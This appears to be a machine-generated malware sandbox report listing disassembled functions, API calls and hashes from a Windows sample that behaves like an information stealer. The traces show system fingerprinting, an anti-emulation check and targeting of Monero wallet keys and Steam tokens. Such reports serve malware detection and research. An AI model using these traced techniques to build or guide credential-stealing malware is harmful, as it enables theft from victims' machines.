Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: dfea970686c444da560885f897de9a116c705f75afab841ca377306f5e32961b
Instruction ID: 8222383b9eb8cfb38c2501cb2d12f85ca0e47511c3e6703622ab72ceab7ca51c
Opcode Fuzzy Hash: dfea970686c444da560885f897de9a116c705f75afab841ca377306f5e32961b
Instruction Fuzzy Hash: 7F016DB2A44308EBC710DF99DD45BAFBBB8FB04B61F10422AEA45A2780D37459008BA1

Function 6CB83060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CB83095

Part of subcall function 6CB835A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CC0F688,00001000), ref: 6CB835D5
Part of subcall function 6CB835A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CB835E0
Part of subcall function 6CB835A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CB835FD
Part of subcall function 6CB835A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CB8363F
Part of subcall function 6CB835A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CB8369F
Part of subcall function 6CB835A0: __aulldiv.LIBCMT ref: 6CB836E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CB8309F

Part of subcall function 6CBA5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CBA56EE,?,00000001), ref: 6CBA5B85
Part of subcall function 6CBA5B50: EnterCriticalSection.KERNEL32(6CC0F688,?,?,?,6CBA56EE,?,00000001), ref: 6CBA5B90
Part of subcall function 6CBA5B50: LeaveCriticalSection.KERNEL32(6CC0F688,?,?,?,6CBA56EE,?,00000001), ref: 6CBA5BD8
Part of subcall function 6CBA5B50: GetTickCount64.KERNEL32 ref: 6CBA5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CB830BE

Part of subcall function 6CB830F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CB83127
Part of subcall function 6CB830F0: __aulldiv.LIBCMT ref: 6CB83140

Part of subcall function 6CBBAB2A: __onexit.LIBCMT ref: 6CBBAB30

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 1422709122ce7eb94d82c30985bab125ee8d5f3d74545123ae6c040cdf6742ed
Instruction ID: f422a015890b7f5f26c26798f089c69b3fd9bb4c6303ea6fa9dbc9bcae7d00e6
Opcode Fuzzy Hash: 1422709122ce7eb94d82c30985bab125ee8d5f3d74545123ae6c040cdf6742ed
Instruction Fuzzy Hash: FFF0F912F24B849BCA10DF7488415EAB374AF6B214F52171DE88463551FF32A2D88389

Function 003D9470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 003D9484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003D94A5
CloseHandle.KERNEL32(00000000), ref: 003D94AF

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 465f5331e4d6c2e305e293be3e481fb2081a1455ab23f51b1cab2c5c588eb019
Instruction ID: da306c7f2b3e0923b0cda3fafb03d2730e143e8166468697f17911ebd4ed40b1
Opcode Fuzzy Hash: 465f5331e4d6c2e305e293be3e481fb2081a1455ab23f51b1cab2c5c588eb019
Instruction Fuzzy Hash: 36F03A7594020CABDB05DFE4DD4AFEA7778EB08300F008498BA099B290D6B06E85CB91

Function 003C1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003C112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 003C1132
ExitProcess.KERNEL32 ref: 003C1143

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b5f510741f78b28b4e481b56a3d383c62280a0548f54246197fa78d907d8d826
Instruction ID: e8610347a8734a078e5cb94da2fc43408fc3296a9d86d92182e74b233138d980
Opcode Fuzzy Hash: b5f510741f78b28b4e481b56a3d383c62280a0548f54246197fa78d907d8d826
Instruction Fuzzy Hash: E6E0E6709C5308FBE7106BE09C0AF097779AB05B41F105059F709BA1D1D6B56A40A799

Function 003D1A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D7500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003D7542
Part of subcall function 003D7500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003D757F
Part of subcall function 003D7500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7603
Part of subcall function 003D7500: RtlAllocateHeap.NTDLL(00000000), ref: 003D760A

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003D7690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D76A4
Part of subcall function 003D7690: RtlAllocateHeap.NTDLL(00000000), ref: 003D76AB

Part of subcall function 003D77C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,003DDBC0,000000FF,?,003D1C99,00000000,?,00EBD038,00000000,?), ref: 003D77F2
Part of subcall function 003D77C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,003DDBC0,000000FF,?,003D1C99,00000000,?,00EBD038,00000000,?), ref: 003D77F9

Part of subcall function 003D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003C11B7), ref: 003D7880
Part of subcall function 003D7850: RtlAllocateHeap.NTDLL(00000000), ref: 003D7887
Part of subcall function 003D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003D789F

Part of subcall function 003D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7910
Part of subcall function 003D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003D7917
Part of subcall function 003D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003D792F

Part of subcall function 003D7980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003E0E00,00000000,?), ref: 003D79B0
Part of subcall function 003D7980: RtlAllocateHeap.NTDLL(00000000), ref: 003D79B7
Part of subcall function 003D7980: GetLocalTime.KERNEL32(?,?,?,?,?,003E0E00,00000000,?), ref: 003D79C4
Part of subcall function 003D7980: wsprintfA.USER32 ref: 003D79F3

Part of subcall function 003D7A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00EBDD90,00000000,?,003E0E10,00000000,?,00000000,00000000), ref: 003D7A63
Part of subcall function 003D7A30: RtlAllocateHeap.NTDLL(00000000), ref: 003D7A6A
Part of subcall function 003D7A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00EBDD90,00000000,?,003E0E10,00000000,?,00000000,00000000,?), ref: 003D7A7D

Part of subcall function 003D7B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00EBDD90,00000000,?,003E0E10,00000000,?,00000000,00000000), ref: 003D7B35

Part of subcall function 003D7B90: GetKeyboardLayoutList.USER32(00000000,00000000,003E05AF), ref: 003D7BE1
Part of subcall function 003D7B90: LocalAlloc.KERNEL32(00000040,?), ref: 003D7BF9
Part of subcall function 003D7B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 003D7C0D
Part of subcall function 003D7B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003D7C62
Part of subcall function 003D7B90: LocalFree.KERNEL32(00000000), ref: 003D7D22

Part of subcall function 003D7D80: GetSystemPowerStatus.KERNEL32(?), ref: 003D7DAD

GetCurrentProcessId.KERNEL32(00000000,?,00EBD158,00000000,?,003E0E24,00000000,?,00000000,00000000,?,00EBDD30,00000000,?,003E0E20,00000000), ref: 003D207E

Part of subcall function 003D9470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 003D9484
Part of subcall function 003D9470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003D94A5
Part of subcall function 003D9470: CloseHandle.KERNEL32(00000000), ref: 003D94AF

Part of subcall function 003D7E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7E37
Part of subcall function 003D7E00: RtlAllocateHeap.NTDLL(00000000), ref: 003D7E3E
Part of subcall function 003D7E00: RegOpenKeyExA.KERNEL32(80000002,00EABCB0,00000000,00020119,?), ref: 003D7E5E
Part of subcall function 003D7E00: RegQueryValueExA.KERNEL32(?,00EBD018,00000000,00000000,000000FF,000000FF), ref: 003D7E7F
Part of subcall function 003D7E00: RegCloseKey.ADVAPI32(?), ref: 003D7E92

Part of subcall function 003D7F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 003D7FC9
Part of subcall function 003D7F60: GetLastError.KERNEL32 ref: 003D7FD8

Part of subcall function 003D7ED0: GetSystemInfo.KERNEL32(003E0E2C), ref: 003D7F00
Part of subcall function 003D7ED0: wsprintfA.USER32 ref: 003D7F16

Part of subcall function 003D8100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00EBDD78,00000000,?,003E0E2C,00000000,?,00000000), ref: 003D8130
Part of subcall function 003D8100: RtlAllocateHeap.NTDLL(00000000), ref: 003D8137
Part of subcall function 003D8100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003D8158
Part of subcall function 003D8100: __aulldiv.LIBCMT ref: 003D8172
Part of subcall function 003D8100: __aulldiv.LIBCMT ref: 003D8180
Part of subcall function 003D8100: wsprintfA.USER32 ref: 003D81AC

Part of subcall function 003D87C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003E0E28,00000000,?), ref: 003D882F
Part of subcall function 003D87C0: RtlAllocateHeap.NTDLL(00000000), ref: 003D8836
Part of subcall function 003D87C0: wsprintfA.USER32 ref: 003D8850

Part of subcall function 003D8320: RegOpenKeyExA.KERNEL32(00000000,00EBAB60,00000000,00020019,00000000,003E05B6), ref: 003D83A4

Part of subcall function 003D8320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003D8426
Part of subcall function 003D8320: wsprintfA.USER32 ref: 003D8459
Part of subcall function 003D8320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 003D847B
Part of subcall function 003D8320: RegCloseKey.ADVAPI32(00000000), ref: 003D848C
Part of subcall function 003D8320: RegCloseKey.ADVAPI32(00000000), ref: 003D8499

Part of subcall function 003D8680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003E05B7), ref: 003D86CA
Part of subcall function 003D8680: Process32First.KERNEL32(?,00000128), ref: 003D86DE
Part of subcall function 003D8680: Process32Next.KERNEL32(?,00000128), ref: 003D86F3
Part of subcall function 003D8680: CloseHandle.KERNEL32(?), ref: 003D8761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 003D265B

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 3113730047-0
Opcode ID: da85afc802646d0f3ce6dd9c6498ec8ac1050bcdd30745ec7be4359e96a21562
Instruction ID: 13ec291ef97263ffa6759b771ce88430c81943fe25238a9bacb3792523e8fb57
Opcode Fuzzy Hash: da85afc802646d0f3ce6dd9c6498ec8ac1050bcdd30745ec7be4359e96a21562
Instruction Fuzzy Hash: D172B373C10558AACB1BFB90EDA2DEE777CAF14300F5042AAB41666191EF302B49DF65

Function 003C6D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d0040b3b2ff6619840d5664a6dc40c0bf98c2e580f2cbc3381a096013cb5f0d
Instruction ID: 1cff17bb3e7190717a4a6490cd0d1678de414d81ac64be7d0f8b39acef8f0c98
Opcode Fuzzy Hash: 2d0040b3b2ff6619840d5664a6dc40c0bf98c2e580f2cbc3381a096013cb5f0d
Instruction Fuzzy Hash: 136136B4900218DFCB15DF94E98AFEEB7B4BB08304F10859DE419AB281D735AE94DF91

Function 003D5100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA820: lstrlen.KERNEL32(003C4F05,?,?,003C4F05,003E0DDE), ref: 003DA82B
Part of subcall function 003DA820: lstrcpy.KERNEL32(003E0DDE,00000000), ref: 003DA885

lstrlen.KERNEL32(00000000,00000000,003E0ACA), ref: 003D512A

Strings

steam_tokens.txt, xrefs: 003D513F

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
